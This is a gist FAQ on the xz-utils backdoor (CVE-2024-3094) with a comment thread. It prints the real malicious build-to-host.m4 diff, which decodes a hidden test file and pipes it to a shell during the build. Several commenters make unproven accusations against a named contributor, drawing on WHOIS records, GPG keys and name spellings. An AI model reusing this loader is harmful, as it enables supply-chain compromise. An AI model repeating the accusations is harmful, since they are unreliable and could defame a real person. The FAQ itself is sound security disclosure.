Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active November 4, 2024 18:32
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@christoofar
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there seem to be .xz test files from the 5.6.1 release.

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)

Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in.
https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

@gonoph
Copy link

gonoph commented Apr 3, 2024

The name 'Chien Wong' is a bit suspicious

Chien Wong - I looked at his github:

  • Created in 2015
  • bunch of activity in the last year 2023+
  • 2020, started putting in some activity into other repos
  • "lessons learned from lzma" post was created 3 weeks ago
  • created his homepage on github pages 4 months ago

The only anomaly is: GitHub says his profile is in Nanjing, China, with a TZ of GMT+08, but:

  • created the current home page on Christmas Eve (Dec 24th, 2023)
  • then updated his 404 page for New Years (Jan 1st, 2024)

However, not a smoking gun of anything at this point.

In fact, if you use the Internet Archive (TW:language) to view his past incarnations, you can see it was hosted since 2015 as well. Interesting enough, on the 2017 copy of the website, his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

This profile looks organic. My own github activity history has a similar pattern. I'm also bad about keeping my homepage up to date.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

          /* The last A-MSDU subframe has no padding. */
          if (last_subframe)
            subframe_length = 14+msdu_length;
          else
            subframe_length = WS_ROUNDUP_4(14+msdu_length);

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time. That could be the tool he used.

$ gpg --keyserver keyserver.ubuntu.com --recv-key 5CA58A39FA4122AD
$ gpg --list-sig 5CA58A39FA4122AD
pub   ed25519 2022-06-21 [SC] [expires: 2032-06-18]
      615887C24F853CE9191F944E5CA58A39FA4122AD
uid           [ unknown] Chien Wong <m@xv97.com>
sig 3        5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>
sub   cv25519 2022-06-21 [E] [expires: 2032-06-18]
sig          5CA58A39FA4122AD 2022-06-21  Chien Wong <m@xv97.com>

@imelon123
Copy link

Registrant Country of the domain very likely changed to CN on 2023-06-05T11:01:50Z

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-06-05T11:01:50Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2024-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Jiangsu
Registrant Postal Code: DATA REDACTED
Registrant Country: CN
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-09-08T08:08:33Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2023-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED

Domain Name: XV97.COM
Registry Domain ID: 1965709820_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2020-05-26T08:11:21Z
Creation Date: 2015-10-03T12:33:29Z

Registrar Registration Expiration Date: 2021-10-03T12:33:29Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: None
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: DATA REDACTED

@zacanger
Copy link

zacanger commented Apr 3, 2024

@gonoph

his name is Ch'ien Wang instead of Chien Wong. I'm not familiar enough with Chinese names to know if that is odd or not.

The interesting bit is that it's mixing romanizations. Ch'ien is Wade-Giles, Chien is simplified Wade, and Qian (implied by his work email, qwang) would be pinyin. Wong and Wang are also likely the same name, depending on location. Could definitely be an immigrant to the mainland from Taiwan or overseas, or just changing it based on stylistic preference.

@lhmouse

We do not know how to pronounce 'Chien'.

Qián

@RufusExE
Copy link

RufusExE commented Apr 3, 2024

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

@lhmouse
Copy link

lhmouse commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang':
(https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
[u̯ɑŋ] Wang Wang
[u̯əŋ] Weng Weng
[i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

@orangepizza
Copy link

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc?
thing github sure have it but not sure about lesso's log, it's already logs few years old

@rdebath
Copy link

rdebath commented Apr 3, 2024

The only odd thing is his gpg key, which has a ridiculous 10 year expiration time.

That is 3650 days, exactly the sort of period that would be chosen by someone who believes they have to choose a period but don't want to be bothered by it. In fact I'm not even sure which way (too long or too short) you believe that it is "ridiculous" as it has been used as a popular replacement for "never expires" a lot. I would assume "too long" due to the insecurity and value assumptions about websites of the CAB.

@daniel-dona
Copy link

Saw an interesting commit over in cpython: python/cpython@ea51476
Its part of PR python/cpython#115989
The bytecode there seem to be .xz test files from the 5.6.1 release.
Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)
I then saw the person who made the PR to cpython seems to be 'Chien Wong' who:
a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53) b) was thanked by Jia Tan for the work on the RISC-V stuff (https://git.tukaani.org/?p=xz.git;a=commit;h=440a2eccb082dc13400c09e22308a58fef85146c) - note that Jia Tan updated the risc-v 'test' files (https://git.tukaani.org/?p=xz.git;a=commit;h=0b4ccc91454dbcf0bf521b9bd51aa270581ee23c) c) pushed for a Rust project to be updated to include xz 5.6.0 (Portable-Network-Archive/liblzma-rs#91) d) mentioned a questioned change in the cpython PR as, basically, 'this was important to prevent tests failing' - different scenario but it remind me of the apparent reasoning for 'fixing' the valgrind issue. (python/cpython@68979bc#r1505355565)
Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

Our little friend is on GitLab and he asked for filter enhancements to Wireshark. Still has two MRs out there waiting to push in. https://gitlab.com/wireshark/wireshark/-/merge_requests?scope=all&state=merged&author_username=ivq

@thesamesam we have a winner

What's the problem with the Gitlab MRs?

@xry111
Copy link

xry111 commented Apr 3, 2024

@zacanger

Wong and Wang are also likely the same name,

As far as I know, no transliteration scheme for Mandarin ever confuses 'Wong' with 'Wang': (https://resources.allsetlearning.com/chinese/)

Sample IPA Pinyin Wade-Giles
王 [u̯ɑŋ] Wang Wang
翁 [u̯əŋ] Weng Weng
雍 [i̯ʊŋ] Yong Yung
锺/钟 [tʂʊŋ] Zhong Chung

https://en.wikipedia.org/wiki/Wong_(surname)

@Z-nonymous
Copy link

I think this removes all doubt.

ivq/homepage@696470a#diff-36b91ec80ca75f577eb44c59060b08c14c8a7dda2f9bebabe65f31278d4e7a65

Thanks @christoofar, that's a great find.

Especially that posts/c-api-design-learned-from-lzma/index.html file.

I find it also weird that one would add the test files from xz while there's actually not used in tests from what I understood.

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

I agree, given the obfuscation to try to make it happen "in plain sight", it would certainly have been prepared with crafted personas to point fingers in a different direction should it be discovered.
There's so many possibilities behind this that at layman level, we can only speculate, and only intelligence agencies can get to the bottom of this.

For those who like to imagine stories, theories and are averse to Occam's razor (others can skip) you can start with checking when gzip was replaced by xz, what the history behind LZMA. You can also check the timelime when JiaT75 was activated. Also remember old news, read wikipedia articles here , there, here and also read tech news like this, or this, and you can imagine hundreds of possible stories. You can also throw away Occam's razor, and imagine others used that to do triple or quadruple finger-pointing indirections.

But don't read too much, one might end up hallucinating more than an LLM.

For sure Intelligence Agencies have mapped out all possibilities and are invistigating all.

@pillowtrucker
Copy link

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago. Not that I believe he's ever even seen AIX or HPUX, but that's a pretty funny claim considering those unixes were notoriously awful and a general laughing stock in terms of engineering AND security.
Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?
I'm not sure if you're really good at masking malice as incompetence, or if you're genuinely a low iq schizophrenic.
All Easter spent trying to blame China.

@Z-nonymous
Copy link

Z-nonymous commented Apr 3, 2024

Now your smoking gun to blame another Chinese guy is that he made a blog about the allocator ?

Read this https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504

The malware implements a custom allocator, which is obtained from get_lzma_allocator @ 0x4050

Reminder: the z-anomyous's guy original claim to expertise is that he supposedly wrote advanced programmes like this https://www.cvedetails.com/cve/CVE-1999-1208/ for "commercial unix" 25 years ago.

That CVE 👍 I never understood why one in their right mind would count starting with 0.
Past experience was more of a disclaimer saying I might be wrong, and for sure Linux, bash and gcc work differently. Feel free to understand it as argument of authority if you believe experience 25 years ago on a different OS is what that means.

Also, not sure why you're giving someone adding the compromised unused xz test files into cpython repo more forgiveness than me, when I've disclaimed ahead I'm not expert of the topic and could be wrong.

All Easter spent trying to blame China

Me ? Where ? Just for the joke on previous post added some facts than can just justify there are strong leads to other countries that could be behind it. And it's not even picked up in your claim. Read again and see how I'm making fun of speculating who is behind the attack.

I don't know who, and I don't think it actually matters who is behind the attack.

Maybe it's important to see what is the attack really targetting. There are strong evidences there are parts of the script that try to limit it to some architectures.
As noted by some, some parts make no sense, like previously mentionned checks on $build is when it appears not to work with how it's populated with eval.

Sure x86 is the target, but since other architectures were added recently in past years are these beeing really exempted or targetted too ? Do all those RISC-specific architecture code changes actually belong in all those tools ? Are they supposed to prevent using faulty code on said architecture or not.

Those are legitimate questions. Raising awareness is not accusing a country.

I think it's interesting to remind also some hardware like x86 Intel/AMD have trade bans for some countries actually at war. Maybe in some remote geography that's not that big of a threat. Countries could modify their architecture supply chains to pursue their plans or not.

@AdrianBunk
Copy link

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc? thing github sure have it but not sure about lesso's log, it's already logs few years old

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

@xry111
Copy link

xry111 commented Apr 3, 2024

Would log from git.tukaani.org can give us more detail about commits like what IP it from/ merge time difference /vs commit's time etc? thing github sure have it but not sure about lesso's log, it's already logs few years old

No:

https://tukaani.org/xz-backdoor/

Only I have had access to the main tukaani.org website, git.tukaani.org repositories, and related files.

Well, I thought GH was the mirror of git.tukaani.org but the fact is the opposite.

Then maybe MS can find something in the log of GitHub. And maybe we can use GH API to gather some info when the repo is re-enabled.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 3, 2024

@wibeipummedo says: Saw an interesting commit over in cpython: python/cpython@ea51476

Its part of PR python/cpython#115989

The bytecode there

It's not "bytecode". It's real instructions that you should be able to disassemble.

seem to be .xz test files from the 5.6.1 release.

It happens to be from 5.6.1, but was it added in 5.6.1?

Fortunately the cpython developers appear to have removed the bytecode from the PR (python/cpython@32725a7)

It adds bloat, that we are sure of. But as far as the invocation is involved, it is benign and neither runs the code nor triggers the backdoor.

a) has a commit in xz-utils recently (https://git.tukaani.org/?p=xz.git;a=commit;h=eee579fff50099ba163c12305e81a4bd42b7dd53)

That's a documentation commit. The most parsimonious result would be that Wong, like the unfortunate 1password guy and the... (what's the embedded thing called? anyway, someone went to update the project url and license) guy, is just being too excited about new versions. The only difference is that he's got a Sinitic name.

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!


Re: romanization

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

"Ch'ien Wang" is a more normal spelling under Wade-Giles. I think zacanger has gotten it right. The final change to "Wong" is not-Mandarin, but it's kinda justified by being fashionable.

At least we're still mostly dealing with Mandarin.

@zacanger
Copy link

zacanger commented Apr 3, 2024

@lhmouse

No transliteration scheme for Mandarin

Jyutping (Canto). That does kind of stand out to me, but I'm not a native speaker, I don't know if anyone would usually mix the two.

Around my part of the world, it's not too rare for online people (including programming people) to dabble in Sinitic romanizations and Sinitic topolects. Sometimes they just get weird ideas about "which romanization is best", about as meaningful as debating which Unicode normalization method is best.

@Artoria2e5 thank you for clarifying

@4i8
Copy link

4i8 commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

@christoofar
Copy link

christoofar commented Apr 3, 2024

If gnu/linux is hackable, then nothing is secure anymore.

define "secure".

If more users pushed to IPv6-only and raise the expense of scanning the network a lot higher, the giant increase of failed tcp dials are easier for network carriers to see and deal with.

any vps/cloud provider not giving you a healthy sized IPv6 range by default is garbage, and configured and turned on in their bake scripts so there is no excuse

cloudflare should demand edges go on to IPv6-only and not have 80/8080/443 open on IPv4, then sunset allowing edges having sshd on standard ports

the IPv4 universe is in a fucked state. I don't know why anyone thinks they can deal with serving anything on that network unless they have an incident response center in 5 time zones. I never serve sshd out on it. Moving the port lowers the scan hits quite a bit, IPv6 drops them waaaay down.

I hate this network I wish it would end.

@christoofar
Copy link

christoofar commented Apr 3, 2024

For those of you who just want a secure way to sshd to do your admin and IPv6 is never happening in the near term, then check out Loki or Yggdrasil. Ygg is dead-easy to set up. Your distro probably already has a package for it, or you can build it yourself. You don't need to join it to public Ygg nodes (by not joining the public Ygg network, that creates your own private IPv6 encrypted network automatically. if any of your peers in your network is configured to join another Ygg network, then that bridges the two networks together).

Within your LAN if IPv6 broadcasting works, nodes you add will find each other and link up. It's like OpenVPN but just-add-water. https://yggdrasil-network.github.io

Then you can iptables/ufw whitelist the nodes you're bridging across IPv4 private-public. This step prevents anyone attacking your Ygg bridge much less seeing it.

You can also whitelist the hostkeys themselves in yggdrasil.conf to limit what can pair. (if you don't do the keys, then do the iptables)

Once you have that up, you can go into sshd_conf on your public server and stop serving out on IPv4 completely or do whatever you need to do to close the port to the Internet.

It also handles the case where your ISP won't even let you host anything---now you can (by setting up Ygg on a vps and going back to your host and adding it as a peer).

@christoofar
Copy link

christoofar commented Apr 4, 2024

Lasse updated his Plans section and mentions that the Jia code may be going to a git museum repo, he will rebase Jia out of xz in a 5.8.0 release.

Plans
I plan to write an article how the backdoor got into the releases and what can be learned from this. I’m still studying the details.

xz.git needs to be gotten to a state where I’m happy to say I fully approve its contents. It’s possible that the recent commits in master will be rebased to purge the malicious files from the Git history so that people don’t download them in any form when they clone the repo. The old repository could still be preserved in a separate read-only repository for history: the contents of its last commit could equal some commit in the new repository.

These will unfortunately but obviously take several days.

A clean XZ Utils release version could jump to 5.8.0. Some wish that it clearly separates the clean one from the bad 5.6.x.

https://tukaani.org/xz-backdoor/

@christoofar
Copy link

with libsystemd rolling out the dlopen() change and OpenSSH adding support for systemd notify...
openssh/openssh-portable@08f5792

